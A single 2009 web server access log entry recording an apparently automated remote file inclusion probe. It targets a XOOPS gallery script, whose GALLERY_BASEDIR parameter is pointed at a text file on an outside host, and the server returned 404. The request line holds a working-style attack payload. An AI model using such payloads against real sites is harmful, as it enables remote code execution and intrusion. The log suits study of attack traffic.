125.251.147.130 - - [30/Jun/2009:20:20:37 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.2u264.com/bbs//include/idi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "cityofarkadelphia.com"
